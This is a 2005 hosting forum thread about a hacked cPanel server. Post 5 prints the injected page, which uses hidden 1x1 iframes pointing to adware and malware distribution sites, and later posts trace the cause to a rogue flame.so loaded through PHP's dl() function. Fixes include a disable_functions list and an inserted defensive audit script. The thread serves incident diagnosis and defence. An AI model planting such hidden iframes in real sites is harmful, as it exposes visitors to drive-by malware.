
Server hacked and sites redirected

Discussion in 'General Discussion' started by php-dawg, May 5, 2005.

  1. php-dawg

    php-dawg Active Member

    Joined:
    Jul 9, 2003
    Messages:
    31
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Atlanta, GA
    All the sites on one of our servers have been redirected to a site that downloads viruses to the local computer trying to view the site. It is causing http errors everywhere. One minute a site can be seen without a problem, but then suddenly apache gets to where it can not find the pages any longer for any of the sites. Then if you go out of the browser and back into the site, you will get a pop-up and a re-direct which then tries to download software and viruses on your computer.

    There is nothing in my tmp directory, it is set to noexec. I checked all my ports and can not find anything out of the ordinary. The files do not seem to reside on our server, it looks almost like they have hijacked bind or our IP addresses. The default site on the server works just fine however.

    Some of the sites with dedicated IP addresses seem to work ok if we enter through the dedicated IP address. It only seems to be affecting certain IP addresses on the server.

    Any ideas?
     
  2. haze

    haze Well-Known Member

    Joined:
    Dec 21, 2001
    Messages:
    1,550
    Likes Received:
    3
    Trophy Points:
    38
    I'd probably start going into damage control if you don't have a system admin on duty, or available at all. Get a new box, lock it down as best you can and start restoring from remote backups that you know have not been tainted. You could of course take the time to try and figure it all out, but it might take a little longer this way and you're just wasting your clients' money and time if you don't know where to go from here. I'd also have someone examine the box and see what went wrong, and see what measures you can employ in future to help avoid such a thing in future.

    My advice, go for a managed dedicated server solution, or hire a competent system administrator, but focus right now on your clients!

    Securing your /tmp is nothing more than a step in the right direction, but it's in no way a solution from hackers or crackers.

    Best of luck and I hope for your sake you have a fast recovery.
     
  3. gorilla

    gorilla Well-Known Member

    Joined:
    Feb 3, 2004
    Messages:
    699
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Sydney / Australia
    could be an inside job, check your customers and see if you got some dodgy ones !
     
  4. php-dawg

    php-dawg Active Member

    Joined:
    Jul 9, 2003
    Messages:
    31
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Atlanta, GA
    I know that the tmp directory is just a start. We have done a lot of server hardening on the boxes that we have. This is the only one that has been compromised. All the sites on the server have been there for over 12 months. We have not been adding customers to this server because it is at its limit. We have been managing cPanel servers for over 3 years and Linux servers for over 7 years. I simply wanted to see if anyone here might have some insight or think of something that we forgot to check.
     
  5. php-dawg

    php-dawg Active Member

    Joined:
    Jul 9, 2003
    Messages:
    31
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Atlanta, GA
    Here is the code in the page:

    <html>
    <iframe src='http://url-exchange.net' width=1 height=1></iframe>
    <iframe src='http://toolbarpartner.com/in.php?wm=den' width=1 height=1></iframe>
    <iframe src='http://protraff.us/top/index.html' width=1 height=1></iframe>
    </html>
     
  6. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    The most likely suspect is going to be a vulnerable PHP script or application. Have you checked the versions of any php apps on that account (esp phpBB) plus any other php pages? Often the clues will be in the apache errorlog if you can pinpoint the date and time that the alterations were made.

    There are plenty of other possibilities, e.g. guessed FTP password (evidence should be in your FTP logs); guessed password and cPanel File Manager used (not much evidence likely); all the way up to an OS compromise on the server.
     
  7. php-dawg

    php-dawg Active Member

    Joined:
    Jul 9, 2003
    Messages:
    31
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Atlanta, GA
    Yeah, that is the fun part, there is nothing in my error_log file for apache pointing to anything weird. All phpBB boards are up to date. I guess this server is dead.
     
  8. php-dawg

    php-dawg Active Member

    Joined:
    Jul 9, 2003
    Messages:
    31
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Atlanta, GA
    Update, I found that if I suspend one account on the main IP for the server, all accounts get suspended that are using that IP address. Would this be an .htaccess file somewhere?
     
  9. PeteC

    PeteC Well-Known Member

    Joined:
    May 8, 2003
    Messages:
    106
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Texas
    I have the same exact symptoms on one server since yesterday evening. Please share anything you find.

    I have discovered that after an Apache restart, it takes a minute or more for the redirecting to start up.

    As a lame interim solution I'm restarting Apache every minute and that makes users think things are OK. I am likely going to pull all sites off the server unless I can find a security guru who can find and fix this problem for me.

    I have done a lot of Internet searching, and this seems like a relatively new hack because your post is the first mention I've found anywhere about this.
     
  10. PeteC

    PeteC Well-Known Member

    Joined:
    May 8, 2003
    Messages:
    106
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Texas
    I've unsuccessfully looked all over for an .htaccess file. I don't think that's it.
     
  11. easyhoster1

    easyhoster1 Well-Known Member

    Joined:
    Sep 25, 2003
    Messages:
    659
    Likes Received:
    0
    Trophy Points:
    16
    You may want to check this URL, do you have a backup of your httpd.conf file?

    http://isc.sans.org/diary.php?date=2005-03-13

    One more scripted mass hack

    It seems as if several web sites were modified in yet another mass hack yesterday, similar to the one we've reported two months ago. Most likely, a script was used to amend all web sites hosted on one or more shared servers with a hostile IFRAME, redirecting visitors to hxxp://www.tgp.la/or.html. Don't go there - it's an Adware site, redirecting to places where you maybe should not tread, including a page on realizeit.biz that tries the CHM exploit to drop a present. Checking with a search engine, it looks as if more than 1500 pages have been thus modified. Thanks to ISC reader Roger for letting us know.
     
    #11 easyhoster1, May 6, 2005
    Last edited: May 6, 2005
  12. PeteC

    PeteC Well-Known Member

    Joined:
    May 8, 2003
    Messages:
    106
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Texas
    That was a good read, but it's not what's happened on my server. On mine, no files are modified in the web space of individual Web sites.
     
  13. jroes

    jroes Member

    Joined:
    Feb 9, 2005
    Messages:
    22
    Likes Received:
    0
    Trophy Points:
    1
    try the following:

    updatedb
    slocate flame.php
    slocate flame.so

    If you find it, suspend the accounts that have it, and disable the dl() function in your php.ini

    Google around for flame.so or flame.php.
     
  14. php-dawg

    php-dawg Active Member

    Joined:
    Jul 9, 2003
    Messages:
    31
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Atlanta, GA
    This went away for all of Saturday and part of Sunday morning, then it came back worse than ever.

    jroes, thank you for your suggestion, it was exactly where the problem had started. I don't know how you found out about it to begin with, but I did suspend the user account and all the problems went away.
     
  15. gorilla

    gorilla Well-Known Member

    Joined:
    Feb 3, 2004
    Messages:
    699
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Sydney / Australia
    have a read here which is covering the same issue http://forums.cpanel.net/showthread.php?t=37761&page=2
    so i guess securing your php.ini for this specific exploit is essential
    and the other thing you could do as well is

    pico /usr/lib/php.ini
    find disable function with
    ctrl+w disable_functions
    and modify it to

    disable_functions = "system,dl,exec"
     
    #15 gorilla, May 9, 2005
    Last edited: May 9, 2005
  16. d4rkl0rd

    d4rkl0rd Active Member

    Joined:
    Feb 23, 2004
    Messages:
    39
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    India
    This is an issue with the dl() function in php. You need to set the following line in your /usr/lib/php.ini


    --------------------------------
    enable_dl = Off
    --------------------------------

    this is the latest bug with dl(). Also search for flame.so files, you can use the locate command to find them,

    locate flame.so


    remove them from the server. Probably these 'so' files might have been installed under some of your users' /public_html/img directory. After everything is over restart httpd.
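    The three fixes the thread converges on (posts 13, 15 and 16: disable dl(), set enable_dl = Off, and hunt for stray .so files under web roots) are easy to verify in one pass. The script below is an added example and is not from any poster in the thread; it audits a php.ini for both settings and lists shared objects under a directory tree. The sample php.ini contents, the /home/site/public_html/img path and the empty flame.so stand-in it creates are constructed for the demonstration; the real php.ini path on these servers is the /usr/lib/php.ini the thread names.

```shell
#!/bin/sh
# Added example, not from the thread: audit php.ini for the dl() hardening
# the thread recommends and list shared objects under a web root.

# Print the effective value of a php.ini directive. Commented lines (";key")
# are skipped, the last assignment wins, surrounding quotes are dropped.
# Usage: ini_value FILE KEY
ini_value() {
    sed -n "s/^[[:space:]]*$2[[:space:]]*=[[:space:]]*//p" "$1" \
        | tail -n 1 | tr -d '"' | sed 's/[[:space:]]*$//'
}

# Return 0 when FILE both turns enable_dl off and lists dl in
# disable_functions; otherwise print each missing setting and return 1.
# An unset enable_dl counts as not hardened (PHP 4/5 default it to On).
php_dl_hardened() {
    ini="$1"; ok=0
    enable_dl=$(ini_value "$ini" enable_dl)
    case "$enable_dl" in
        [Oo]ff|0|[Ff]alse|[Nn]o) ;;
        *) echo "enable_dl is '$enable_dl' in $ini (expected Off)"; ok=1 ;;
    esac
    # disable_functions is comma separated, with optional spaces
    disabled=$(ini_value "$ini" disable_functions | tr ',' '\n' | tr -d ' ')
    echo "$disabled" | grep -qx dl \
        || { echo "dl is not listed in disable_functions in $ini"; ok=1; }
    return $ok
}

# Print every *.so file under DIR; web roots should normally contain none.
find_shared_objects() {
    find "$1" -type f -name '*.so' 2>/dev/null
}

# Build constructed sample input in DIR: a weak php.ini, a hardened one,
# and a fake account tree holding an empty flame.so (stand-in, not malware).
make_samples() {
    d="$1"
    mkdir -p "$d/home/site/public_html/img"
    : > "$d/home/site/public_html/img/flame.so"
    printf '%s\n' '[PHP]' ';enable_dl = Off' 'enable_dl = On' \
        'disable_functions =' > "$d/weak.ini"
    printf '%s\n' '[PHP]' 'enable_dl = Off' \
        'disable_functions = "system, dl, exec"' > "$d/hardened.ini"
}

# Stand-alone use: sh audit_php_dl.sh /usr/lib/php.ini /home
if [ "$#" -eq 2 ]; then
    php_dl_hardened "$1" && echo "php.ini: dl() disabled both ways"
    echo "shared objects under $2:"
    find_shared_objects "$2"
fi
```

    Run it against the live php.ini and the accounts' home tree; any .so it prints under public_html deserves the same treatment the thread gives flame.so (suspend the account, remove the file, restart httpd after php.ini is fixed). Both enable_dl = Off and dl in disable_functions are checked because either alone leaves a gap if the other is later reverted.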
     
  17. htmlhost

    htmlhost Registered

    Joined:
    Dec 23, 2004
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    Thanks d4rkl0rd,

    Your solution worked perfectly for me... :)
     